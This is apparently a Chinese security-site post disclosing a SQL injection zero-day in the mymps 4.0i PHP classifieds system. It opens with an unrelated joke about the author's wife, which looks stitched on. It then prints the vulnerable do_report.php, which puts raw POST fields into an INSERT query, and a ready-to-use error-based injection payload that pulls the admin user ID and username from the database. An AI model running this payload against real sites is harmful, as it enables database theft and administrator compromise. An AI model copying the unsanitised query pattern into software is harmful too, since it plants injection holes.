原因:
老婆说自己月经怎么还不来呢,急死了。。。突然老婆月经来了。囧,这是事实。。。
老婆说:[你个屌丝,懂什么是月经么。]
作者说:[不懂!]。
老婆说[那你去做你屌丝应该做的事情吧,必须先把我送回去,不然你让我自己走,我会晕倒的!]。我流泪了。
谢谢老婆,你原谅我是一位屌丝。
文件do_report.php
<?php
!defined('IN_MYMPS') && exit('FORBIDDEN');
require_once MYMPS_DATA."/config.db.php";
require_once MYMPS_INC."/db.class.php";
$ip = GetIP();
$infoid = isset($_POST['infoid']) ? intval($_POST['infoid']) : '';
$infotitle = isset($_POST['infotitle']) ? trim($_POST['infotitle']) : ''; //
$content = isset($_POST['content']) ? trim($_POST['content']) : '';//
$report_type = isset($_POST['report_type']) ? trim($_POST['report_type']) : '';//
if(mymps_count("info_report","WHERE infoid = '$infoid' AND ip = '$ip' AND pubtime > '".mktime(0,0,0)."'") > 0){
echo "<center style=\"color:red; font-weight:bold\">操作失败,该信息您已经举报过了!</font>";
exit;
}
$db->query("INSERT INTO `{$db_mymps}info_report` (report_type,content,infoid,infotitle,ip,pubtime)VALUES('$report_type','$content','$infoid','$infotitle','$ip','".$timestamp."')");
echo "<div style=\"margin:10px 15px\"><font style=\"color:red; font-size:12px\"><h1>感谢您的举报 :)</h1>● 在".$mymps_global[SiteName].",每天有数千条违规信息通过用户举报被删除。● 如果你是不小心点错了举报按钮,别担心。只有当一个信息收到一定数量的举报时才会被删除。</font></div>";
?>
一看都是注入 //
然后看看是哪个文件 www.2cto.com
上图就是问题所在
利用代码如下:
代码如下
part=do_report&infoid=87382231&infotitle=123','ip1',(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,userid,0x2D,uname,0x7E31)%20FROM%20my_admin%20where id=1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))#&report_type=2&content=asasas
infoid需要修改下,不然,你懂的。哈哈。
查看更多关于蚂蚁php分类信息系统mymps 4.0i utf版0Day - 网站安全的详细内容...